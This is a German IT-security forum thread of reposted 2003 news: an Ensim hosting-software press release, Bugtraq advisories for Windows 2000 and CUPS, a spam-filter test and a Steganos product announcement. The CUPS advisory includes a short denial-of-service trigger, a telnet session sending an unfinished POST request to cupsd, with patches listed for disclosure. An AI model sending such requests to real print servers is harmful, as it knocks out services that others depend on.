Ensim WEBppliance Pro arbeitet mit der "Virtual Private File System"-Technologie. Damit ist auf der Website der Zugriff auf entsprechende Daten ausschließlich für autorisierte Benutzer möglich. Bisher konnte jeder Shared Website-Besitzer unberechtigten Zugriff auf andere Webseiten dieses Servers erlangen, indem er die entsprechenden Shell Kommandos und Scripts verwendete. Mit dem Security System von Ensim werden Webhoster nunmehr in die Lage versetzt, die Direktiven für Datenschutz der Europäischen Kommission vollständig einzuhalten. Diese verpflichten den Anbieter, alle entsprechenden Maßnahmen zu setzen, um persönliche Informationen vor Verlust, Missbrauch, unberechtigten Zugriff, Verbreitung, Änderung oder Zerstörung zu schützen.

"Wir sehen es als unsere Verpflichtung an, den europäischen Kunden die beste und sicherste Website-Hosting Software zu liefern, die zur Zeit verfügbar ist.", sagt Steve Dauber, Vice President Marketing von Ensim. "Hosting Provider können nunmehr einen neuen Qualitätsstandard im Service anbieten, indem sie die jetzt deutschsprachige Control Panel Software von Ensim verwenden."

Die Produkte

Ensim WEBppliance Pro ist eine Control Panel Software, mit der Webhoster hochprofessionelle Shared Hosting Plattformen entwickeln und verwalten können. Partner, Reseller und KMUŽs als Kunden werden damit einfach und anwendergerecht, dennoch aber mit maximalem professionellen Approach bedient. Ensim WEBppliance Pro beinhaltet Managing-Tools für den Webserver, für Websites und E-Mail sowie für Reseller Channels. Die Administrationsrechte können zu Resellern, Inhabern der Websites oder zu den Endbenutzern delegiert werden.

Ensim WEBppliance Basic wurde speziell für jene Webmaster entwickelt, die ihren eigenen Dedicated Webserver betreiben. Mit einfach zu bedienenden Automatisierungstools, einem Lernprogramm sowie umfangreicher Online Hilfe rückt Ensim WEBppliance Basic flexible Anwenderorientierung in den Vordergrund. Betreiber oder Eigentümer von Websites, die auf Shared Hosting Plattformen liegen, können einfach und ohne großen Trainingsaufwand oder Fachwissen auf einen Dedicated Server umsteigen.

Das Userinterface ist bei beiden Produktlinien dasselbe. Es hilft den Hosting Providern, Supportkosten zu sparen und für die Reseller und Endkunden einfache Upgrade-Bereiche zu höherwertigen Produkten zu definieren.

Mit diesen umfangreichen Softwarepaketen wird es möglich, ohne großen Aufwand Hosting Lösungen sowohl auf Shared Hosting Basis als auch auf Dedicated Servern zu entwickeln und anzubieten.

Über Ensim

Ensim Corporation gilt als der Weltmarktführer für Hosting Software. Ensim ist ein Privatunternehmen mit dem Hauptquartier in Sunnyvale, Kalifornien, USA. Die Produkte werden weltweit von Service Providern und deren Resellern zur Automatisierung und Verwaltung von Hosting Systemen verwendet. Über die Hälfte der Top U.S. Service Provider vertrauen auf Ensim, um professionelle Hosting Angebote liefern zu können. Nähere Informationen sind unter http://www.ensim.com oder unter der Telefonnummer +1-408-745-3300 zu finden.

PresseTextLink
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #119
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Aktuelle Sicherheitslücken

Code ausführbar in Windows 2000



Betriebsystem: Microsoft Windows 2000 und verschiedene 2000 Server
Typ: Unzureichende Sicherheitsprüfung


Problem: Ist im Internet Explorer die Sicherheitsstufe auf "Medium-Low" kann ein Angreifer das Herunterladen und Installieren von Treibern durch einem Dialog veranlassen.
Effekt: Ist der sog. Treiber entsprechend manipuliert kann durch ihn eine Pipe zur Verfügung gestellt werden, die unautorisierte RPC (Remote Procedure Calls) ermöglicht.
Lokal: nein
Remote: ja


Exploit: Derzeit sind uns keine Exploits bekannt.
Lösung: Microsoft Service Pack 4


Veröffentlicht: 08.07.2003
Aktualisiert: 08.07.2003
Quelle: Bugtraq

______________


Denial of Service in CUPS



Betriebsystem: Verschiedene Linux Distributionen
Software: Easy Software Products CUPS 1.1.6 - 1.1.18
Typ: Fehlerhafte Ausnahmebehandlung


Problem: Der cupsd versäumt es fehlerhafte HTTP Anfragen nach einem Timeout zu beenden.
Effekt: Ein Angreifer kann dies ausnützen um den cupsd für gültige Anfragen zu blockieren.
Lokal: nein
Remote: ja


Exploit: $ telnet ipp
POST /printers/ HTTP/1.1
Lösung: Die Hersteller der meisten betroffenen Distributionen haben Patches bereitgestellt. Ausserdem hat Easy Software ebenfalls Patches bereitgestellt.


Veröffentlicht: 08.07.2003
Aktualisiert: 08.07.2003
Quelle: Bugtraq
 
  • NEWS AUS DEM IT-SECURITY BEREICH Beitrag #120
F

Fireglider

PowerUser Sir Henry
Dabei seit
12.12.1999
Beiträge
14.335
Reaktionspunkte
9
Kostenloser Spamkiller gewinnt Test

Spam ist ein Massenphänomen. Kein Wunder also, dass die US-Verbraucherzeitung Consumer Reports Anti-Spam-Lösungen untersucht hat. Sieger wurde das einzige kostenlose Produkt im Testfeld, der SAproxy, ein lokaler E-Mail-Proxy-Server für Windows, dem der leistungsfähige Spamfilter SpamAssassin eingebaut ist.

Die Zeitschrift wird von der seit 1936 existierenden Consumers Union herausgegeben, dem einflussreichen US-Pendant zur Stiftung Warentest. Zwar habe SAproxy mit 80 Prozent nicht die beste Spam-Erkennungsrate unter den elf getesteten Anwendungen, begründete die Organisation ihr Urteil, aber er hat sich als "fast perfekt" bei der Identifikation von Nicht-Spam erwiesen. Einige weit verbreitete Anti-Spam-Tools fehlen allerdings im Testfeld, zum Beispiel SpamPal oder SpamNet. Auch Lyris MailShield Desktop, das im Test in c't 22/2002 am besten abgeschnitten hat, wurde vom Consumer Report nicht mitgetestet.

SpamAssassin ist als Perl-Skript plattformübergreifend einsetzbar. Der Artikel "Tod dem Spam in c't 22/2002, S. 168 beschreibt seine Einrichtung auf dem Server. Auf gadma.net findet sich eine Beschreibung, wie man SpamAssassin in den unter Windows weit verbreiteten Mail- und News-Server Hamster einbaut; die Konfiguration unter Mac OS X beschreibt Benjamin Trott. SpamAssassin und der SAproxy finden sich auch auf der CD zur aktuellen Ausgabe der c't. (jo/c't)


HeiseLink

________


Steganos Internet Security 5 mit Dialer-Abwehr



Sicherheits-Software bekämpft lästige Spam-Mails


Das Programmpaket Steganos Internet Security 5 besteht aus den Komponenten AntiVirus, Personal Firewall, Internet Anonym und InternetSpuren-Vernichter. Als Neuerung wurde das Tool Mail CleanUp gegen unerwünschte Werbe-Mails sowie ein AntiDialer integriert. Das Programmpaket soll Anwender somit vor allerlei Gefahren aus dem Internet schützen.

Der AntiDialer 2 überwacht alle DFÜ-Verbindungen und soll so teure 0190-Einwahlen verhindern. Dabei verspricht der Hersteller auch einen Schutz vor CAPI- und TAPI-Dialern, die nicht im DFÜ-Netzwerk erscheinen, sondern Modem respektive ISDN-Karte direkt ansprechen.

Das Tool Mail CleanUp bekämpft lästige Werbe-Mails (Spam), indem diese vorher ausgefiltert werden. Dafür werden Betreffzeile, Mail-Adresse und der Mail-Header nach Schlüsselwörtern durchforstet, wobei sich entsprechende Wortfilter frei definieren lassen. Parallel dazu lassen sich E-Mails ab einer frei wählbaren Größe aussortieren. Der Spam-Filter soll sich mit jedem POP3-Mail-Client verstehen, beherrscht jedoch keinen Zugriff via IMAP4. Erkannte Spam-Mails werden mit oder ohne Rückfrage direkt auf dem Server gelöscht. Zusätzlich lässt sich eine täuschend echte "Unzustellbarkeit"-Mail an den Spam-Absender versenden, um die Richtigkeit der eigenen E-Mail-Adresse zu verschleiern.

AntiVirus 5 fahndet nach Würmern, Trojanischen Pferden und Viren und soll durch Heuristik auch unbekannte Fremdlinge erkennen können. Für ein Jahr lang sind wöchentliche Updates der Virensignaturen im Kaufpreis der Software enthalten. Vor Hacker-Angriffen oder Spyware soll einen die Personal Firewall Online Shield bewahren, wobei sich der Anwender per SMS über abgewehrte Angriffe informieren lassen kann.

Mit Internet Anonym 5 anonymisiert man seinen Internet-Besuch und bewegt sich wie ein Online-Phantom unerkannt im Internet. Somit verheimlicht man Website-Betreibern die eigentliche IP-Adresse und gaukelt diesen vor, man sei mal als Schwede oder mal als Australier im Internet - auf Wunsch wechseln die Identitäten im Sekundentakt. Außerdem bietet das Tool einen Pop-Up-Blocker und Filterfunktionen gegen gefährliche Web-Inhalte.

Der InternetSpuren-Vernichter beseitigt Surf-Spuren der Browser Internet Explorer ab Version 4.x, Netscape ab Version 6.x, AOL 6 und 7 sowie T-Online 4.0. Ein kostenloses Update soll die Unterstützung von T-Online 5.0 bald nachliefern. Das Tool löscht auf Knopfdruck Verlaufslisten, den Browser-Cache und Cookies. Den Browser Opera unterstützt die Software nicht. Über den zum Lieferumfang gehörenden Shredder lassen sich die Daten durch mehrmaliges Überschreiben bei Bedarf unwiderruflich vernichten.

Steganos Internet Security 5 soll ab sofort für die Windows-Plattform zum Preis von knapp 49,95 Euro erhältlich sein.

GolemLink
 
Thema:

NEWS AUS DEM IT-SECURITY BEREICH

ANGEBOTE & SPONSOREN

https://www.mofapower.de/

Statistik des Forums

Themen
213.179
Beiträge
1.579.170
Mitglieder
55.874
Neuestes Mitglied
hnte
Oben